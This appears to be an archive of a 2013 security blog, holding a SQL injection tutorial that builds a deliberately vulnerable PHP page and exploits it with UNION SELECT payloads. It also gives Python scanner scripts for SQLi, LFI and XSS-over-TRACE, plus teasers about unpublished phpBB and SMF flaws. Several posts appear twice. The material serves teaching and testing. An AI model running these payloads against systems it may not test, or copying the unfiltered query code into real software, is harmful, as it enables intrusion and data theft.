Few days ago I found few bugs in latest phpBB code.
In short story I need few servers for tests 'few cases' of possible exploit.
If you have installed latest phpBB or you want to check out if there is a
possibility to build working exploit, let me know via email.
Saturday, 30 March 2013
Wednesday, 27 March 2013
[EN] IdeAbout SQL Injections
Understanding SQLI. @ 26.03.2013
http://HauntIT.blogspot.com
---------------------------------------------------------------
Why I understood it is more important to test 'for sqli bugs' by reading the code.
Once you find it 'at the code' you will know exactly 'where' and 'what payload' you need to
'put' by injection attack to this vulnerable place/parameter/cookie/whatever.
For example. 'Error-based' attacks. Ok, great attack, etc, but what if somewhere (in the
code) you have a 'filter' which will block all error-generating actions (or of course 'block it'
by generating some 'error page' or whatever else like this could be done here too, to protect this webapp
or setting of php.ini file, you name it).
Another thing about error based sqli vulnerabilities: you can miss something very,
very interesting. :)
Like of course other types of sql injection vulns, some XSS-based vulnerabilities (like XSS in
SQL query).
Let's go deeper...
---------------------------------------------------------------
How can we do it?
---------------------------------------------------------------
...and how can we find it in the code. Right.
So. First example of course should be simple. 'More-advanced' script can be done too if you like it.
Think about possible output of this command:
$cd your/web/code; grep -n -r -e <soon> ./
Great, we have 'stage 1'.
-n - is 'give me the line number'. Very useful.
-r - yes, recursive.
-e 'regexp' - man will help you here.
Run 'man grep'. And check it. Do not read what's next! ;]
Because next, we will find sql injection vulnerability. And purpouse of this text is:
you must (know and) understand "how to" find sqli bug in your (or your customers) code.
So, if you alread read a man for grep command, we can go deeper again...
---------------------------------------------------------------
What can we do now.
---------------------------------------------------------------
And how. ;)
Good excercise! Go to wordpress.org and find (I mean download) few sample plugin codes.
This is very good practice to get to know how sqli bugs can be found.
Another good idea is below. (But if you choosed to try out downloaded WP-plugins, go to unpacked
plugins directory now.)
(We must search via entire code, but at this moment, we can use grep without '-r', so
we will search only in current directory. It will be 'longer-way' but we are learning
right now, remember?;))
Ok: Grep, and grep, maybe something else to use now?
Right, try 'man egrep' ;]
$ egrep -n -e "SELECT|INSERT" *.php | grep DESC | grep -e "\\$"
What is good to remember:
- if you're using egrep with "something|else", in case of 'searching for sql injections' it could be useful
to search like this: egrep -n -r -e "select |insert " <- check it twice if you can not see a ' ' (space) between
'sql-word'(select) and |.
Ok, now it could be used with:
$ egrep -n -r -e "SELECT | INSERT | (other sql command you want here)" ./ | grep "DESC" (for example of course*) | grep -e "\\$"
what will give you:
- paremeters ($...),
- queries with 'DESC' (but be carefull here, once uppon a time I found that searching for this command (DESC) echo'ed 'other' output (strings) than 'ASC' (for ASC there was no output). So think about what you're looking for because you can get exactly what you've asked. ;))
- and of course 'sql-command' that you wanted.
Very useful 'command' was used in 'SQL Injection Attack and Defence' by Justin Clarke from 'Syngress':
If you are looking for a good book about sql injection ('attack and defence' ;) ) ...
Buy it! ;]
(some small modifications by me;) and we have a grep-tool 'one-liner')
$grep -n -r "\(select \|insert \|update \|where \|order by \)\(.*$_\(GET\|POST\|HTTP_\).*\)" ./ | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
(Remember that in this 'example' we are looking for vulnerabilities in PHP based-webapp. So add here another bash command to 'extract' only interesting us data (without checking for sql-commands in files like TXT for example).)
$grep -n -r "\(select \|insert \|update \|where \|order by \)\(.*$_\(GET\|POST\|HTTP_\).*\)" ./ | grep -e "\.php" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Disappointed? ;]
Try this one:
$ grep -n -r "\(select \|insert \|update \|where \|order by \)" ./ | grep -e "\.php" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Still could be 'bad'. :C
Maybe this one:
$ grep -n -r "\(select \|insert \|update \|where \|order by \)" ./ | grep -e "\.php" | grep -e "\\$" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Yes, it's 'giving' for grep another, and another... 'value' for searching...
We can do it for one week for example. :) But this is too long.
So maybe now we should 'switch places' with 'programmer/coder/developer'.
Where (as a 'programmer') you will 'have to' use SQL language?
Few examples (in):
- registering users
- mail to them (via form/contact - if there's any at your site)
- forum/blog/board/guest book
- search (if page is generated by content from db)
- forgotten-password mechanism
- and so on...
Stop here, and think about it in (an)other way. Where else can be sqli found?
If 'this webapp is so big', (as a programmer) you will (? ;)) have to use some
let's say 'catalog' to store (and include or use in the future) there your filtering
functions, db-functions, other, and other functions... Like a 'lib' directory.
So 'ls -la', and where is the (typically) include or lib or library, and so on.
(That's why attacker who want to hack your page will do a file/dir-searching-attack
to find out, if at your websrv is any 'interesting' directory (or file, like 'admin.php.back', etc).
Ok. Let's back to our searching 'via e/grep'.
What file is using for what, can be guessed by simple reading their names. ;)
Usually of course. For example (at typical ls -la ./webapp/) we'll have something like:
$/phpBB3/includes$ ls ../
adm config.php download files index.php memberlist.php report.php style.php viewforum.php web.config
cache cron.php faq.php images language output.txt search.php styles viewonline.php
common.php docs feed.php includes mcp.php posting.php store ucp.php viewtopic.php
$
or something similar.
What we can find 'for first' is files (to search for vulns, soon) like:
config.php, mcp.php, search.php, viewtopic.php, etc, etc...
So we should use now our grep to search only in this directory (./):
$ grep -n "\(select \|insert \|update \|where \|order by \)" *.php | grep -e "\.php" | grep -e "\\$" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Nice. (let it be saved to >output.txt for now)
Now you have an idea what and how can you start for searching sql injection bugs.
---------------------------------------------------------------
Example from course of 'how to make your page with mysql'
---------------------------------------------------------------
We wil stop at this moment to get to know how webapplication is builded
with sql commands. How can it be done, how sql-queries are created.
We will use now a simple example: page where 'id' parameter is related to
user (a student let's say). If page-visitor will send (via HTTP GET) a value
for 'id' param, he (visitor) will 'go directly do DB' to try if there is a
table or column (or...?) with value '1' for something like 'id parameter'.
---------------------------------------------------------------
How it looks like (from code-point-of-view):
---------------------------------------------------------------
First of all we must create a page which will use SQL language:
To do that, we need our 'sample database' to get content from there (by our page).
To create our database we need to connect to our sql server:
$ mysql -u root -p
>mysql> create database school;use school;
Your database should look like this:
mysql> describe students;
+----------+-----------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+----------+-----------------+------+-----+---------+----------------+
| id | int(5) unsigned | NO | PRI | NULL | auto_increment |
| name | varchar(20) | YES | | NULL | |
| surname | varchar(100) | YES | | NULL | |
+----------+-----------------+------+-----+---------+----------------+
Ok, if you have it, now we can write a simple page to GET information about
'id' (of student we want to check).
--page.php--
<html>
<title>our learning system</title>
<body>
<?php
if(!mysql_connect('localhost','youruser','yourpass')){
echo 'can not connect to DB :C';
exit(0);
}
if(!mysql_select_db('school')){
echo 'can not use selected database';
exit(0);
}
$id = $_GET['id']; // 1
$query = "SELECT * from students where id=$id"; // 2
$response = mysql_query($query);
echo '<p><br>';
echo '<table border="1"><tr>';
echo '<td><strong>id</strong></td>';
echo '<td><strong>name</strong></td>';
echo '<td><strong>surename</strong></td></tr>';
while($row = mysql_fetch_row($response)){
echo '</tr>';
echo '<td>'.$row[0].'</td>';
echo '<td>'.$row[1].'</td>';
echo '<td>'.$row[2].'</td>';
echo '</tr>';
}
echo '</table>';
if(!mysql_close()){
echo 'can not close db connection :C<br>';
exit(0);
}
?>
</body>
</html>
--page.php--
As we can see, our page.php is getting 'id' value from simple GET.
(Tip here: if you're testing sql injection vulnerabilities at your server, you can use
one interesting command to do a little debug and to find more precisely where exacly we can try to
exploit a possibility of vulnerable piece of code. Try this:
root@box:~# tail -n 1 -f /var/log/mysql.log
This command will print out a result of SQL query.)
For example:
(At linux console, we have tail -n 1... and in the browser we have a (full address) to our page.php)
Try this: http://localhost/page.php?id=1
Output of 'tail'-command is probably something like this:
(...)
root@box:~# tail -n 1 -f /var/log/mysql/mysql.log
169 Quit
130327 11:44:16 170 Connect tester@localhost on
170 Init DB school
170 Query SELECT * from students where id=2
170 Quit
(...)
Great. Let's look what will be at our page, if we do not add any id-value:
http://localhost/page.php?id=(nothing here, enter)
(...)
130327 11:54:55 171 Connect root@localhost on
171 Init DB school
171 Query SELECT * from students where id=
171 Quit
(...)
Ok, let's add a simple 'wrong query', this could be used here: %^&*(*&^Y}:":>')
http://localhost/page.php?id=%^&*(*&^Y}:":>')
Response from mysql.log:
172 Query SELECT * from students where id=%^
Ok, so & deleted our string. Lets try without this character:
173 Query SELECT * from students where id=%^*(*^Y}:":>')
Great. Let back to the directory with page.php file and type there our 'egrep' command:
$ grep -n "\(select \|insert \|update \|where \|order by \)" *.php | grep -e "\.php" | grep -e "\\$" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
filename: page.php
line: 20
match: $zapytanie = "SELECT * from students where id=$id";
------next is:--------
Ok. So because of no filtering here (//2) and because of (cat page.php)
no filtering when parameter 'id' is GET'ed (//1), we can try to add here some
SQL commands/queries:
id=1' and select version(); --
Answer (tail) is:
174 Query SELECT * from students where id=1' and select version(); --
Let's try without '. Still nothing. So maybe we should compare this (//1) SELECT
with other SELECT command? Or maybe with OR command?
Let's try it out:
183 Query SELECT * from students where id=1 OR 1=1
Great, we have all of students listed at output page(.php).
I think you've already heared about UNION SELECT.
Let's try if there is an opportunity to exploit this vulnerable page.php by sending to
parameter 'id' UNION command:
If your webapp/webserver is secured some how, you should connect directly to your mysql-console.
Try to do the same as code in page.php, so:
SELECT * from students WHERE id=1.
Now 'mix' this sql-query with UNION:
mysql> select * from students where id=1 UNION SELECT version(),1;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from students where id=1 UNION SELECT version(),2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from students where id=1 UNION SELECT version(),2,3;
+-----------------------------+-------+----------+
| id | name | surname |
+-----------------------------+-------+----------+
| 1 | wacek | kapusta |
| 5.5.29-0ubuntu0.12.04.1-log | 2 | 3 |
+-----------------------------+-------+----------+
2 rows in set (0.00 sec)
That's it. We have an exploit for SQL injection vulnerability:
http://localhost/page.php?id=1 UNION SELECT version(),2,3;
or of course:
http://localhost/page.php?id=1 UNION SELECT version(),user(),database();
Now you can back to checking phpBB :)
Good luck and have fun!
---
To be continued...
http://HauntIT.blogspot.com
http://HauntIT.blogspot.com
---------------------------------------------------------------
Why I understood it is more important to test 'for sqli bugs' by reading the code.
Once you find it 'at the code' you will know exactly 'where' and 'what payload' you need to
'put' by injection attack to this vulnerable place/parameter/cookie/whatever.
For example. 'Error-based' attacks. Ok, great attack, etc, but what if somewhere (in the
code) you have a 'filter' which will block all error-generating actions (or of course 'block it'
by generating some 'error page' or whatever else like this could be done here too, to protect this webapp
or setting of php.ini file, you name it).
Another thing about error based sqli vulnerabilities: you can miss something very,
very interesting. :)
Like of course other types of sql injection vulns, some XSS-based vulnerabilities (like XSS in
SQL query).
Let's go deeper...
---------------------------------------------------------------
How can we do it?
---------------------------------------------------------------
...and how can we find it in the code. Right.
So. First example of course should be simple. 'More-advanced' script can be done too if you like it.
Think about possible output of this command:
$cd your/web/code; grep -n -r -e <soon> ./
Great, we have 'stage 1'.
-n - is 'give me the line number'. Very useful.
-r - yes, recursive.
-e 'regexp' - man will help you here.
Run 'man grep'. And check it. Do not read what's next! ;]
Because next, we will find sql injection vulnerability. And purpouse of this text is:
you must (know and) understand "how to" find sqli bug in your (or your customers) code.
So, if you alread read a man for grep command, we can go deeper again...
---------------------------------------------------------------
What can we do now.
---------------------------------------------------------------
And how. ;)
Good excercise! Go to wordpress.org and find (I mean download) few sample plugin codes.
This is very good practice to get to know how sqli bugs can be found.
Another good idea is below. (But if you choosed to try out downloaded WP-plugins, go to unpacked
plugins directory now.)
(We must search via entire code, but at this moment, we can use grep without '-r', so
we will search only in current directory. It will be 'longer-way' but we are learning
right now, remember?;))
Ok: Grep, and grep, maybe something else to use now?
Right, try 'man egrep' ;]
$ egrep -n -e "SELECT|INSERT" *.php | grep DESC | grep -e "\\$"
What is good to remember:
- if you're using egrep with "something|else", in case of 'searching for sql injections' it could be useful
to search like this: egrep -n -r -e "select |insert " <- check it twice if you can not see a ' ' (space) between
'sql-word'(select) and |.
Ok, now it could be used with:
$ egrep -n -r -e "SELECT | INSERT | (other sql command you want here)" ./ | grep "DESC" (for example of course*) | grep -e "\\$"
what will give you:
- paremeters ($...),
- queries with 'DESC' (but be carefull here, once uppon a time I found that searching for this command (DESC) echo'ed 'other' output (strings) than 'ASC' (for ASC there was no output). So think about what you're looking for because you can get exactly what you've asked. ;))
- and of course 'sql-command' that you wanted.
Very useful 'command' was used in 'SQL Injection Attack and Defence' by Justin Clarke from 'Syngress':
If you are looking for a good book about sql injection ('attack and defence' ;) ) ...
Buy it! ;]
(some small modifications by me;) and we have a grep-tool 'one-liner')
$grep -n -r "\(select \|insert \|update \|where \|order by \)\(.*$_\(GET\|POST\|HTTP_\).*\)" ./ | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
(Remember that in this 'example' we are looking for vulnerabilities in PHP based-webapp. So add here another bash command to 'extract' only interesting us data (without checking for sql-commands in files like TXT for example).)
$grep -n -r "\(select \|insert \|update \|where \|order by \)\(.*$_\(GET\|POST\|HTTP_\).*\)" ./ | grep -e "\.php" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Disappointed? ;]
Try this one:
$ grep -n -r "\(select \|insert \|update \|where \|order by \)" ./ | grep -e "\.php" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Still could be 'bad'. :C
Maybe this one:
$ grep -n -r "\(select \|insert \|update \|where \|order by \)" ./ | grep -e "\.php" | grep -e "\\$" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Yes, it's 'giving' for grep another, and another... 'value' for searching...
We can do it for one week for example. :) But this is too long.
So maybe now we should 'switch places' with 'programmer/coder/developer'.
Where (as a 'programmer') you will 'have to' use SQL language?
Few examples (in):
- registering users
- mail to them (via form/contact - if there's any at your site)
- forum/blog/board/guest book
- search (if page is generated by content from db)
- forgotten-password mechanism
- and so on...
Stop here, and think about it in (an)other way. Where else can be sqli found?
If 'this webapp is so big', (as a programmer) you will (? ;)) have to use some
let's say 'catalog' to store (and include or use in the future) there your filtering
functions, db-functions, other, and other functions... Like a 'lib' directory.
So 'ls -la', and where is the (typically) include or lib or library, and so on.
(That's why attacker who want to hack your page will do a file/dir-searching-attack
to find out, if at your websrv is any 'interesting' directory (or file, like 'admin.php.back', etc).
Ok. Let's back to our searching 'via e/grep'.
What file is using for what, can be guessed by simple reading their names. ;)
Usually of course. For example (at typical ls -la ./webapp/) we'll have something like:
$/phpBB3/includes$ ls ../
adm config.php download files index.php memberlist.php report.php style.php viewforum.php web.config
cache cron.php faq.php images language output.txt search.php styles viewonline.php
common.php docs feed.php includes mcp.php posting.php store ucp.php viewtopic.php
$
or something similar.
What we can find 'for first' is files (to search for vulns, soon) like:
config.php, mcp.php, search.php, viewtopic.php, etc, etc...
So we should use now our grep to search only in this directory (./):
$ grep -n "\(select \|insert \|update \|where \|order by \)" *.php | grep -e "\.php" | grep -e "\\$" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
Nice. (let it be saved to >output.txt for now)
Now you have an idea what and how can you start for searching sql injection bugs.
---------------------------------------------------------------
Example from course of 'how to make your page with mysql'
---------------------------------------------------------------
We wil stop at this moment to get to know how webapplication is builded
with sql commands. How can it be done, how sql-queries are created.
We will use now a simple example: page where 'id' parameter is related to
user (a student let's say). If page-visitor will send (via HTTP GET) a value
for 'id' param, he (visitor) will 'go directly do DB' to try if there is a
table or column (or...?) with value '1' for something like 'id parameter'.
---------------------------------------------------------------
How it looks like (from code-point-of-view):
---------------------------------------------------------------
First of all we must create a page which will use SQL language:
To do that, we need our 'sample database' to get content from there (by our page).
To create our database we need to connect to our sql server:
$ mysql -u root -p
>mysql> create database school;use school;
Your database should look like this:
mysql> describe students;
+----------+-----------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+----------+-----------------+------+-----+---------+----------------+
| id | int(5) unsigned | NO | PRI | NULL | auto_increment |
| name | varchar(20) | YES | | NULL | |
| surname | varchar(100) | YES | | NULL | |
+----------+-----------------+------+-----+---------+----------------+
Ok, if you have it, now we can write a simple page to GET information about
'id' (of student we want to check).
--page.php--
<html>
<title>our learning system</title>
<body>
<?php
if(!mysql_connect('localhost','youruser','yourpass')){
echo 'can not connect to DB :C';
exit(0);
}
if(!mysql_select_db('school')){
echo 'can not use selected database';
exit(0);
}
$id = $_GET['id']; // 1
$query = "SELECT * from students where id=$id"; // 2
$response = mysql_query($query);
echo '<p><br>';
echo '<table border="1"><tr>';
echo '<td><strong>id</strong></td>';
echo '<td><strong>name</strong></td>';
echo '<td><strong>surename</strong></td></tr>';
while($row = mysql_fetch_row($response)){
echo '</tr>';
echo '<td>'.$row[0].'</td>';
echo '<td>'.$row[1].'</td>';
echo '<td>'.$row[2].'</td>';
echo '</tr>';
}
echo '</table>';
if(!mysql_close()){
echo 'can not close db connection :C<br>';
exit(0);
}
?>
</body>
</html>
--page.php--
As we can see, our page.php is getting 'id' value from simple GET.
(Tip here: if you're testing sql injection vulnerabilities at your server, you can use
one interesting command to do a little debug and to find more precisely where exacly we can try to
exploit a possibility of vulnerable piece of code. Try this:
root@box:~# tail -n 1 -f /var/log/mysql.log
This command will print out a result of SQL query.)
For example:
(At linux console, we have tail -n 1... and in the browser we have a (full address) to our page.php)
Try this: http://localhost/page.php?id=1
Output of 'tail'-command is probably something like this:
(...)
root@box:~# tail -n 1 -f /var/log/mysql/mysql.log
169 Quit
130327 11:44:16 170 Connect tester@localhost on
170 Init DB school
170 Query SELECT * from students where id=2
170 Quit
(...)
Great. Let's look what will be at our page, if we do not add any id-value:
http://localhost/page.php?id=(nothing here, enter)
(...)
130327 11:54:55 171 Connect root@localhost on
171 Init DB school
171 Query SELECT * from students where id=
171 Quit
(...)
Ok, let's add a simple 'wrong query', this could be used here: %^&*(*&^Y}:":>')
http://localhost/page.php?id=%^&*(*&^Y}:":>')
Response from mysql.log:
172 Query SELECT * from students where id=%^
Ok, so & deleted our string. Lets try without this character:
173 Query SELECT * from students where id=%^*(*^Y}:":>')
Great. Let back to the directory with page.php file and type there our 'egrep' command:
$ grep -n "\(select \|insert \|update \|where \|order by \)" *.php | grep -e "\.php" | grep -e "\\$" | awk -F : '{print "filename: "$1"\nline: "$2"\nmatch: "$3"\n------next is:--------\n"}'
filename: page.php
line: 20
match: $zapytanie = "SELECT * from students where id=$id";
------next is:--------
Ok. So because of no filtering here (//2) and because of (cat page.php)
no filtering when parameter 'id' is GET'ed (//1), we can try to add here some
SQL commands/queries:
id=1' and select version(); --
Answer (tail) is:
174 Query SELECT * from students where id=1' and select version(); --
Let's try without '. Still nothing. So maybe we should compare this (//1) SELECT
with other SELECT command? Or maybe with OR command?
Let's try it out:
183 Query SELECT * from students where id=1 OR 1=1
Great, we have all of students listed at output page(.php).
I think you've already heared about UNION SELECT.
Let's try if there is an opportunity to exploit this vulnerable page.php by sending to
parameter 'id' UNION command:
If your webapp/webserver is secured some how, you should connect directly to your mysql-console.
Try to do the same as code in page.php, so:
SELECT * from students WHERE id=1.
Now 'mix' this sql-query with UNION:
mysql> select * from students where id=1 UNION SELECT version(),1;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from students where id=1 UNION SELECT version(),2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from students where id=1 UNION SELECT version(),2,3;
+-----------------------------+-------+----------+
| id | name | surname |
+-----------------------------+-------+----------+
| 1 | wacek | kapusta |
| 5.5.29-0ubuntu0.12.04.1-log | 2 | 3 |
+-----------------------------+-------+----------+
2 rows in set (0.00 sec)
That's it. We have an exploit for SQL injection vulnerability:
http://localhost/page.php?id=1 UNION SELECT version(),2,3;
or of course:
http://localhost/page.php?id=1 UNION SELECT version(),user(),database();
Now you can back to checking phpBB :)
Good luck and have fun!
---
To be continued...
http://HauntIT.blogspot.com
Monday, 25 March 2013
[EN] Exploit for latest SMF 2.0.4
Hi.
In this week I will publish few new informations about vulnerabilities I found.
For example full technical details about vulnerable (latest) version of SMF 2.0.4 will be available after contact with vendor.
*update:*
I see that in some cases there is a possibility to drop a (web)shell via CSRF attack.
Post will be updated, so...
See you soon! ;)
In this week I will publish few new informations about vulnerabilities I found.
For example full technical details about vulnerable (latest) version of SMF 2.0.4 will be available after contact with vendor.
*update:*
I see that in some cases there is a possibility to drop a (web)shell via CSRF attack.
Post will be updated, so...
See you soon! ;)
Wednesday, 20 March 2013
[EN] Modules in your own webscanner - few OPTIONS
Below we have 2 codes.
First will get all HTTP OPTIONS (if this is possible).
Second one, will try to send TRACE (could be used to XST vulnerabilities).
Here we go:
#!/usr/bin/env python
# try_options.py
#
import httplib
import sys
import string
url = sys.argv[1]
conn = httplib.HTTPConnection(url)
conn.request('OPTIONS','/')
resp = conn.getresponse()
page_respone = resp.read()
#print page_respone
print resp.status, resp.reason
full_answer = resp.getheaders()
#print 'What we have here:\n', full_answer
print '-----------------------------------------------'
i=0
while i < len(full_answer):
print ' -> '.join(full_answer[i])
i=i+1
(Code is at pastebin too).
Next stage is to try if we can use TRACE (if test before will show us this method available):
#!/usr/bin/env python
# try_trace.py
# more at http://hauntit.blogspot.com
#
import httplib
import sys
import string
url = sys.argv[1]
conn = httplib.HTTPConnection(url)
#conn.request('TRACE','/w0rkin')
conn.request('TRACE','/<script>alert(/w0rkin/)</script>')
resp = conn.getresponse()
page_response = resp.read()
#print page_response
print
print 'try TRACE for: ', url
print 'Status: ',resp.status, resp.reason
full_answer = resp.getheaders()
print '\nWhat we have here:\n'#, full_answer
print '-----------------------------------------------'
i=0
if resp.status == 200:
while i < len(full_answer):
print ' with value: '.join(full_answer[i])
i=i+1
print '-----------------------------------------------'
print 'Response:\n', page_response
else:
print 'No TRACE, or other problem :C' # try manually or add debug here
(and pastebin-version).
Enjoy ;)
First will get all HTTP OPTIONS (if this is possible).
Second one, will try to send TRACE (could be used to XST vulnerabilities).
Here we go:
#!/usr/bin/env python
# try_options.py
#
import httplib
import sys
import string
url = sys.argv[1]
conn = httplib.HTTPConnection(url)
conn.request('OPTIONS','/')
resp = conn.getresponse()
page_respone = resp.read()
#print page_respone
print resp.status, resp.reason
full_answer = resp.getheaders()
#print 'What we have here:\n', full_answer
print '-----------------------------------------------'
i=0
while i < len(full_answer):
print ' -> '.join(full_answer[i])
i=i+1
(Code is at pastebin too).
Next stage is to try if we can use TRACE (if test before will show us this method available):
#!/usr/bin/env python
# try_trace.py
# more at http://hauntit.blogspot.com
#
import httplib
import sys
import string
url = sys.argv[1]
conn = httplib.HTTPConnection(url)
#conn.request('TRACE','/w0rkin')
conn.request('TRACE','/<script>alert(/w0rkin/)</script>')
resp = conn.getresponse()
page_response = resp.read()
#print page_response
print 'try TRACE for: ', url
print 'Status: ',resp.status, resp.reason
full_answer = resp.getheaders()
print '\nWhat we have here:\n'#, full_answer
print '-----------------------------------------------'
i=0
if resp.status == 200:
while i < len(full_answer):
print ' with value: '.join(full_answer[i])
i=i+1
print '-----------------------------------------------'
print 'Response:\n', page_response
else:
print 'No TRACE, or other problem :C' # try manually or add debug here
(and pastebin-version).
Enjoy ;)
[EN] Modules in your own webscanner - SQL injection module
Here I will present a simple idea of how to get to know if your site is vulnerable to SQL Injection.
This code is working on POST requests (idea is grabbed from XSS-ver-POST module).
Code was released because durning few tests I found an 0day vulnerability (sql injection) in one of Joomla's modules (I won't tell you which one was that ;) try it at your own!)
Code is here:
#!/usr/bin/env python
# try_POST_sqli.py
#
# first we will GET argv[1]/page.argv[2] to read it
# and find out what names/inputs/submits/etc... there are.
# next we will POST those param-names separetly with 'payload'.
#
# enjoy.
import urllib
import urllib2
import re
import sys
import httplib
host = sys.argv[1]
path_file = sys.argv[2]
url = host+':80'
url_file = url+path_file
payload = '\';]SQLI?^&*(O:UI:Y@:>T^#/**'
print 'Target: ',host
print 'Vuln file: ',path_file
print 'Full URL to attack:' ,url_file
print
# first we must GET page, to read whole text to find
# if there is any of our 'vulnerable' (to test) string.
get_connect = urllib.urlopen('http://'+url_file)
get_response = get_connect.read()
status = get_connect.getcode()
print 'Status of requested page: ',status
# what we're looking for:
#results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
results = re.findall(" name=\"([^\"]+)\"",get_response)
#############################################################
# hm ;] one idea to test right now. ;D
poc = open('log_file_with_sql_output.txt','w')
#############################################################
# func to send POST to target url+found parameter
def do_post_now(url):
params = urllib.urlencode ( { results[i] : payload } )
headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
connect = httplib.HTTPConnection(url)
connect.request('POST', path_file, params, headers)
response = connect.getresponse()
print response.status, response.reason # 200 OK?
data = response.read()
connect.close() # end of test this parameter at this URL
y=0
line = data.find('MySQL')
if line != -1:
print '\t[+- ( POST SQLI alert! ) -+]'
print '\t [+] Found sqli in line:' ,line
print data[y]
print poc.writelines(data)
#poc.close() # write&save simple p0c file. ;7
y=y+1
# end of do_post_now(url)
# ---
# MAIN:
if len(sys.argv) < 2:
sys.stderr.write('usage: '+sys.argv[0]+' localhost /path/2file.php')
sys.exit(1)
else:
# if result found:
if (len(results)>0):
print '-------------------------------------------------------------'
print 'Got some results :) Now we can try to exploit parameters.\n'
i = 0 # next in list
while i < len(results):
print 'Found param called: ',results[i]
print 'Do POST now, for URL: ', url, ' with param: ', results[i]
do_post_now(url)
# end of this POST for this parameter
# and next line:
i=i+1
# end of while i loop
You can also find this code at pastebin.
Let me know if you have any questions. ;)
Cheers o/
This code is working on POST requests (idea is grabbed from XSS-ver-POST module).
Code was released because durning few tests I found an 0day vulnerability (sql injection) in one of Joomla's modules (I won't tell you which one was that ;) try it at your own!)
Code is here:
#!/usr/bin/env python
# try_POST_sqli.py
#
# first we will GET argv[1]/page.argv[2] to read it
# and find out what names/inputs/submits/etc... there are.
# next we will POST those param-names separetly with 'payload'.
#
# enjoy.
import urllib
import urllib2
import re
import sys
import httplib
host = sys.argv[1]
path_file = sys.argv[2]
url = host+':80'
url_file = url+path_file
payload = '\';]SQLI?^&*(O:UI:Y@:>T^#/**'
print 'Target: ',host
print 'Vuln file: ',path_file
print 'Full URL to attack:' ,url_file
# first we must GET page, to read whole text to find
# if there is any of our 'vulnerable' (to test) string.
get_connect = urllib.urlopen('http://'+url_file)
get_response = get_connect.read()
status = get_connect.getcode()
print 'Status of requested page: ',status
# what we're looking for:
#results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
results = re.findall(" name=\"([^\"]+)\"",get_response)
#############################################################
# hm ;] one idea to test right now. ;D
poc = open('log_file_with_sql_output.txt','w')
#############################################################
# func to send POST to target url+found parameter
def do_post_now(url):
params = urllib.urlencode ( { results[i] : payload } )
headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
connect = httplib.HTTPConnection(url)
connect.request('POST', path_file, params, headers)
response = connect.getresponse()
print response.status, response.reason # 200 OK?
data = response.read()
connect.close() # end of test this parameter at this URL
y=0
line = data.find('MySQL')
if line != -1:
print '\t[+- ( POST SQLI alert! ) -+]'
print '\t [+] Found sqli in line:' ,line
print data[y]
print poc.writelines(data)
#poc.close() # write&save simple p0c file. ;7
y=y+1
# end of do_post_now(url)
# ---
# MAIN:
if len(sys.argv) < 2:
sys.stderr.write('usage: '+sys.argv[0]+' localhost /path/2file.php')
sys.exit(1)
else:
# if result found:
if (len(results)>0):
print '-------------------------------------------------------------'
print 'Got some results :) Now we can try to exploit parameters.\n'
i = 0 # next in list
while i < len(results):
print 'Found param called: ',results[i]
print 'Do POST now, for URL: ', url, ' with param: ', results[i]
do_post_now(url)
# end of this POST for this parameter
# and next line:
i=i+1
# end of while i loop
You can also find this code at pastebin.
Let me know if you have any questions. ;)
Cheers o/
[EN] Modules in your own webscanner - LFI module
Code listed below is a simple LFI-checker. It's based on the same module as XSS-over-POST.
As I wrote before, all of those 'modules' can be rewrited in one, bigger code.
Here is the code:
As I wrote before, all of those 'modules' can be rewrited in one, bigger code.
Here is the code:
#!/usr/bin/env python
# ----
# try_lfi.py - simple find if there is LFI vulnerability
# ----
# - can be also used to find traversal-vulnerabilities
# - tests can be extended to find more information than just passwd file.
import urllib
import sys
#defines:
url=sys.argv[1]
checkLfis = open('LFItext.txt','r')
try_lfi = checkLfis.readlines()
if len(sys.argv) < 2:
sys.stderr.write('usage: '+sys.argv[0]+' http://localhost/page?param=')
sys.exit(1)
else:
print '---------------------------------------------------------------'
print '[+] Searching for traversal/LFI vulnerability at URL: ', url
print '---------------------------------------------------------------'
i=0
for line in try_lfi:
full_url_to_check = url+line
try_page = urllib.urlopen(full_url_to_check)
read_page = try_page.readlines()
i=i+1
print 'Trying: ',line
print 'Status: ', try_page.getcode()
print '\t[~] Now reading the answer to '
print 'find out if there is our \'vulnerable-string\'...'
for read_lines in read_page:
if read_lines.find('root') != -1:
print '\t[+] Found potential LFI bug! '
print 'This is the answer: ', read_lines print '---------------------------------------------------------------'
As you can read at this code, it's using a LFItext.txt file to search some
various strings. At module's source you will find how to use it against
some local-file include vulnerabilities.
Whole code is available also at pastebin.
Feedback is welcome ;)
Enjoy! o/
[EN] Modules in your own webscanner - XSS over POST
This is another example of how python can be used to build (maybe simple but) useful
webapp scanner. This part (called 'module') can be used to figureout where in tested page we
will have a possibility of XSS vulnerablity (via HTTP POST).
It could be a good exercise to connect all of those 'modules' to build 'one code'
to test all vulnerabilities.
To start, create a file named try_POST_xss.py. (Like before, we will need chmod u+x for this file.)
Source code you can find below:
#!/usr/bin/env python
# ----
# try_POST_xss.py
# ----
